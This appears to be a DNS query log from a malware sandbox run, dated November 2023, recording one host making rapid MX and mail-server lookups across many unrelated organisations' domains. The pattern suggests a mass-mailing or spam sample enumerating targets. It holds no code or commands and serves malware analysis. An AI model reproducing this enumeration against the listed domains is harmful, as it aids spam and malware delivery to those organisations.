                                                                                                                                                                                                    Nov 26, 2023 06:59:28.279320002 CET192.168.2.41.1.1.10x9674Standard query (0)highstreet-re.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.280059099 CET192.168.2.41.1.1.10x23afStandard query (0)yahoo.comfreezedA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.281794071 CET192.168.2.41.1.1.10x69c6Standard query (0)beachrecruitment.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.282552004 CET192.168.2.41.1.1.10x50b3Standard query (0)dkrs.gov.uaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.282846928 CET192.168.2.41.1.1.10x58f9Standard query (0)schor.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.285028934 CET192.168.2.41.1.1.10x5a19Standard query (0)gmailvz.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.309341908 CET192.168.2.41.1.1.10xaee3Standard query (0)midcapfunding.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.310399055 CET192.168.2.41.1.1.10xaeaStandard query (0)ondania.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.310575962 CET192.168.2.41.1.1.10x8e59Standard query (0)kvsroraipur.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.310846090 CET192.168.2.41.1.1.10xf9f9Standard query (0)gspousea.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.311156034 CET192.168.2.41.1.1.10xfa9fStandard query (0)macisis.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.311511993 CET192.168.2.41.1.1.10x637cStandard query (0)maxiv.lu.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.312036991 CET192.168.2.41.1.1.10xd9f2Standard query (0)capforge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.312407017 CET192.168.2.41.1.1.10x6bd6Standard query (0)himontessori.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.312832117 CET192.168.2.41.1.1.10xcdf5Standard query (0)rochester-gauges.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.313119888 CET192.168.2.41.1.1.10x698fStandard query (0)mnit.uc.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.313554049 CET192.168.2.41.1.1.10x22a6Standard query (0)srmist.edu.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.313874960 CET192.168.2.41.1.1.10xd24bStandard query (0)americanrecords.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.314155102 CET192.168.2.41.1.1.10x4aa8Standard query (0)lgs-strategies.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.314390898 CET192.168.2.41.1.1.10x493fStandard query (0)edgewater.groupA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.314656019 CET192.168.2.41.1.1.10xbf0Standard query (0)pixiil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.315645933 CET192.168.2.41.1.1.10x9303Standard query (0)ce-logic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.327740908 CET192.168.2.41.1.1.10x8cccStandard query (0)unaj.edu.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.329128981 CET192.168.2.41.1.1.10xebc9Standard query (0)nakupher.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.329341888 CET192.168.2.41.1.1.10xa8f2Standard query (0)quipuapp.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.329663992 CET192.168.2.41.1.1.10xce54Standard query (0)2brosandahosepressurewashing.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.329963923 CET192.168.2.41.1.1.10x96f1Standard query (0)xegge.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.330447912 CET192.168.2.41.1.1.10x20e8Standard query (0)pasarjohar.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.330804110 CET192.168.2.41.1.1.10x4151Standard query (0)coralparkchristian.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.331197977 CET192.168.2.41.1.1.10xcb05Standard query (0)chandigarhuniversityazure.onmicrosoft.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.331461906 CET192.168.2.41.1.1.10x8cceStandard query (0)upn.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.331953049 CET192.168.2.41.1.1.10xcc35Standard query (0)engel-firm.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.332109928 CET192.168.2.41.1.1.10x99bcStandard query (0)samson.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.332756996 CET192.168.2.41.1.1.10xbb23Standard query (0)viidelta.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.334819078 CET192.168.2.41.1.1.10xc723Standard query (0)grg17geblergasse.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.335365057 CET192.168.2.41.1.1.10x131bStandard query (0)kappablu.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.335380077 CET192.168.2.41.1.1.10xada8Standard query (0)schmith.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.335968971 CET192.168.2.41.1.1.10x69eStandard query (0)robinsonland.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.337172985 CET192.168.2.41.1.1.10xd372Standard query (0)y3.qj51acpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.337789059 CET192.168.2.41.1.1.10x23d1Standard query (0)tcetmumbai.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.337927103 CET192.168.2.41.1.1.10x2a7fStandard query (0)utlinks.omMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.338421106 CET192.168.2.41.1.1.10x6f88Standard query (0)tiswheels.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.339344978 CET192.168.2.41.1.1.10x58b3Standard query (0)perrisesd.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.340042114 CET192.168.2.41.1.1.10xe93bStandard query (0)locandafrancigena.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.340998888 CET192.168.2.41.1.1.10x722dStandard query (0)member3.co.zaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.341543913 CET192.168.2.41.1.1.10x80bStandard query (0)webstamp.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.341933966 CET192.168.2.41.1.1.10x5b43Standard query (0)dbschooldelhi.ac.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.342573881 CET192.168.2.41.1.1.10x4bf7Standard query (0)ceuandalucia.esMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.342895985 CET192.168.2.41.1.1.10x12fbStandard query (0)svenssonfriends.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.343750954 CET192.168.2.41.1.1.10x8292Standard query (0)digdig.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.344104052 CET192.168.2.41.1.1.10x1655Standard query (0)leeberg.dkMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.344536066 CET192.168.2.41.1.1.10x5785Standard query (0)firemailbox.clubMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.344788074 CET192.168.2.41.1.1.10xe3efStandard query (0)ardcrushing.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.345586061 CET192.168.2.41.1.1.10x6774Standard query (0)financefast.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.345685005 CET192.168.2.41.1.1.10x4aa9Standard query (0)heathcotebarr.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.346395969 CET192.168.2.41.1.1.10xc9b0Standard query (0)ippals.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.347836971 CET192.168.2.41.1.1.10x75e9Standard query (0)bosworthacademy.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.347924948 CET192.168.2.41.1.1.10xcf2aStandard query (0)federwild.atMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.348676920 CET192.168.2.41.1.1.10x977dStandard query (0)awb-apparatebau.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.349302053 CET192.168.2.41.1.1.10x7cbStandard query (0)privatemoe.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.349490881 CET192.168.2.41.1.1.10x6fdfStandard query (0)2l7g4s.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.349639893 CET192.168.2.41.1.1.10xe0c9Standard query (0)talentius.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.539999008 CET192.168.2.41.1.1.10x7916Standard query (0)cringemonster.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.540668964 CET192.168.2.41.1.1.10x6a4Standard query (0)tradeavenida.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.591478109 CET192.168.2.41.1.1.10x39cdStandard query (0)integraledu.hrA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.605851889 CET192.168.2.41.1.1.10x6111Standard query (0)gmail.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.619487047 CET192.168.2.41.1.1.10xa3cbStandard query (0)prettypollycleaning.aeA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.779597998 CET192.168.2.41.1.1.10xd7daStandard query (0)grantstech.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.808439970 CET192.168.2.41.1.1.10xb7f1Standard query (0)elitebusinesshn.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.818165064 CET192.168.2.41.1.1.10xd4ffStandard query (0)vivanettv.co.keMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.828041077 CET192.168.2.41.1.1.10xa7c6Standard query (0)gstudent.ctu.edu.vnMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.828274012 CET192.168.2.41.1.1.10x5d7aStandard query (0)goldenfishcompany.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.828583002 CET192.168.2.41.1.1.10xc771Standard query (0)bayambnag.gov.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.828902006 CET192.168.2.41.1.1.10x8de4Standard query (0)hightideinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.883682966 CET192.168.2.41.1.1.10x2671Standard query (0)ibright.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.883970022 CET192.168.2.41.1.1.10x8f2cStandard query (0)esoft.academyA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.884289026 CET192.168.2.41.1.1.10xb749Standard query (0)gatewaytoearlylearning.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.899897099 CET192.168.2.41.1.1.10x335dStandard query (0)xtsagency.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.951313019 CET192.168.2.41.1.1.10x7af8Standard query (0)tnav.ruMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:28.951338053 CET192.168.2.41.1.1.10xb43bStandard query (0)belongfbg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.085602999 CET192.168.2.41.1.1.10xdfa9Standard query (0)wonka.ccMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.340522051 CET192.168.2.41.1.1.10x8d47Standard query (0)nyklawfirm.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.340991974 CET192.168.2.41.1.1.10x69c6Standard query (0)beachrecruitment.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.341109037 CET192.168.2.41.1.1.10x50b3Standard query (0)dkrs.gov.uaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.341329098 CET192.168.2.41.1.1.10x8cceStandard query (0)upn.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.341329098 CET192.168.2.41.1.1.10x6497Standard query (0)5.e9mbw4ghMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.342226982 CET192.168.2.41.1.1.10x10cdStandard query (0)healteas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.342226982 CET192.168.2.41.1.1.10xd26dStandard query (0)saudi-jamac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.343059063 CET192.168.2.41.1.1.10x797bStandard query (0)coimbrausa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.343102932 CET192.168.2.41.1.1.10x4b95Standard query (0)matttux.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.344480038 CET192.168.2.41.1.1.10xf28eStandard query (0)avient-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.346613884 CET192.168.2.41.1.1.10x5b24Standard query (0)aoiit-store.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.722794056 CET192.168.2.41.1.1.10x4ed3Standard query (0)foundtoo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.776626110 CET192.168.2.41.1.1.10x3d24Standard query (0)route3.mx.cloudflare.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.777117968 CET192.168.2.41.1.1.10x9431Standard query (0)mail.gasp-ga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.777337074 CET192.168.2.41.1.1.10x4cf1Standard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.780760050 CET192.168.2.41.1.1.10x38cdStandard query (0)exchange.integral.bgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.781388998 CET192.168.2.41.1.1.10x83abStandard query (0)gccb.co.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.782180071 CET192.168.2.41.1.1.10xd6a2Standard query (0)capforge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.782486916 CET192.168.2.41.1.1.10x5ac7Standard query (0)beachrecruitment.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.783093929 CET192.168.2.41.1.1.10xf676Standard query (0)d405642.a.ess.ca.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.783093929 CET192.168.2.41.1.1.10x29eaStandard query (0)mx00.1and1.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.783379078 CET192.168.2.41.1.1.10xebe4Standard query (0)krkconcord-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.784929991 CET192.168.2.41.1.1.10x224cStandard query (0)ASPMX5.GOOGLEMAIL.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.784929991 CET192.168.2.41.1.1.10x6307Standard query (0)mx.mail-data.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.794291019 CET192.168.2.41.1.1.10x9e55Standard query (0)highstreet-re.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.797969103 CET192.168.2.41.1.1.10x5fdcStandard query (0)mx2.zoho.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.797969103 CET192.168.2.41.1.1.10x789cStandard query (0)alt3.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:29.798680067 CET192.168.2.41.1.1.10x9c69Standard query (0)maxiv.lu.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.043066978 CET192.168.2.41.1.1.10x3363Standard query (0)gmailvz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.049551964 CET192.168.2.41.1.1.10xad7bStandard query (0)kvsroraipur.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.049745083 CET192.168.2.41.1.1.10x7c1fStandard query (0)belongfbg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.050216913 CET192.168.2.41.1.1.10x43f7Standard query (0)unaj.edu.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.050530910 CET192.168.2.41.1.1.10x7db7Standard query (0)ce-logic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.050812006 CET192.168.2.41.1.1.10x8d0cStandard query (0)srmist.edu.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.052305937 CET192.168.2.41.1.1.10x88c6Standard query (0)dkrs.gov.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.052305937 CET192.168.2.41.1.1.10x4ae5Standard query (0)alt4.gmr-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.052567959 CET192.168.2.41.1.1.10x768fStandard query (0)octetpowers-in.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.065798044 CET192.168.2.41.1.1.10x2255Standard query (0)alt1.aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.066375017 CET192.168.2.41.1.1.10xa6f6Standard query (0)mx-biz.mail.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.066653013 CET192.168.2.41.1.1.10x6ac1Standard query (0)mx.trouble-free.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.067363024 CET192.168.2.41.1.1.10x5341Standard query (0)mailstore1.secureserver.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.067945004 CET192.168.2.41.1.1.10x5c48Standard query (0)mx1.emailsrvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.071180105 CET192.168.2.41.1.1.10xc62dStandard query (0)harasduberry.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.074553967 CET192.168.2.41.1.1.10xf0dbStandard query (0)jamiesonmullin-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.074553967 CET192.168.2.41.1.1.10x1974Standard query (0)tnav.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.075037003 CET192.168.2.41.1.1.10x7e1cStandard query (0)quipuapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.075975895 CET192.168.2.41.1.1.10x7e47Standard query (0)nakupher.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.076205969 CET192.168.2.41.1.1.10x5ff4Standard query (0)2brosandahosepressurewashing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.076524019 CET192.168.2.41.1.1.10x6f80Standard query (0)xegge.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.076805115 CET192.168.2.41.1.1.10x5970Standard query (0)pasarjohar.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.077838898 CET192.168.2.41.1.1.10x453aStandard query (0)y3.qj51acpA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.077838898 CET192.168.2.41.1.1.10x90cbStandard query (0)chandigarhuniversityazure.onmicrosoft.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.095005989 CET192.168.2.41.1.1.10xe9acStandard query (0)viidelta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.095376968 CET192.168.2.41.1.1.10xa4baStandard query (0)ardcrushing.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.096316099 CET192.168.2.41.1.1.10xf3a8Standard query (0)svenssonfriends.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.097261906 CET192.168.2.41.1.1.10x129cStandard query (0)locandafrancigena.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.098747015 CET192.168.2.41.1.1.10x91a4Standard query (0)mnit.uc.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.103338957 CET192.168.2.41.1.1.10x5341Standard query (0)perrisesd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.103753090 CET192.168.2.41.1.1.10x95a0Standard query (0)tiswheels.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.104048967 CET192.168.2.41.1.1.10x6949Standard query (0)coralparkchristian.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.104238033 CET192.168.2.41.1.1.10x533fStandard query (0)member3.co.zaA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.104357004 CET192.168.2.41.1.1.10x4b4fStandard query (0)tcetmumbai.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.104959965 CET192.168.2.41.1.1.10xc58bStandard query (0)robinsonland.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.105185986 CET192.168.2.41.1.1.10x406bStandard query (0)schmith.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.105427980 CET192.168.2.41.1.1.10xc95eStandard query (0)kappablu.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.105958939 CET192.168.2.41.1.1.10xb7c8Standard query (0)grg17geblergasse.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.106616020 CET192.168.2.41.1.1.10x365dStandard query (0)matttux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.107009888 CET192.168.2.41.1.1.10x46f5Standard query (0)samson.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.107479095 CET192.168.2.41.1.1.10x44e9Standard query (0)engel-firm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.108036041 CET192.168.2.41.1.1.10xfd0eStandard query (0)upn.peA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.108684063 CET192.168.2.41.1.1.10xea10Standard query (0)gstudent.ctu.edu.vnA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.108879089 CET192.168.2.41.1.1.10xb3f1Standard query (0)goldenfishcompany.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.168159008 CET192.168.2.41.1.1.10xbb0aStandard query (0)webstamp.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.175812960 CET192.168.2.41.1.1.10x26Standard query (0)ceuandalucia.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.270123005 CET192.168.2.41.1.1.10xa02eStandard query (0)dbschooldelhi.ac.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.333304882 CET192.168.2.41.1.1.10x4010Standard query (0)digdig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.333909035 CET192.168.2.41.1.1.10xda13Standard query (0)leeberg.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.345814943 CET192.168.2.41.1.1.10x8ee5Standard query (0)firemailbox.clubA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.408431053 CET192.168.2.41.1.1.10x8cceStandard query (0)upn.peMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.408467054 CET192.168.2.41.1.1.10x69c6Standard query (0)beachrecruitment.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.420866013 CET192.168.2.41.1.1.10xf215Standard query (0)heathcotebarr.euA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.425051928 CET192.168.2.41.1.1.10x265dStandard query (0)financefast.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.426759005 CET192.168.2.41.1.1.10x6196Standard query (0)ippals.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.427144051 CET192.168.2.41.1.1.10xaa3dStandard query (0)bosworthacademy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.433334112 CET192.168.2.41.1.1.10xa456Standard query (0)federwild.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.438718081 CET192.168.2.41.1.1.10xd17dStandard query (0)awb-apparatebau.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.442898989 CET192.168.2.41.1.1.10xf2abStandard query (0)elitebusinesshn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.443165064 CET192.168.2.41.1.1.10x9c7bStandard query (0)vivanettv.co.keA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.512907982 CET192.168.2.41.1.1.10x68b0Standard query (0)5.e9mbw4ghA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.899929047 CET192.168.2.41.1.1.10x9a85Standard query (0)nyklawfirm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.900403976 CET192.168.2.41.1.1.10xb5edStandard query (0)rochestergauges-be02c.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.901418924 CET192.168.2.41.1.1.10x9acaStandard query (0)mail.himontessori.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.904855967 CET192.168.2.41.1.1.10x4d64Standard query (0)directlendersllc-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.905217886 CET192.168.2.41.1.1.10x67edStandard query (0)healteas.comA (IP address)IN (0x0001)false
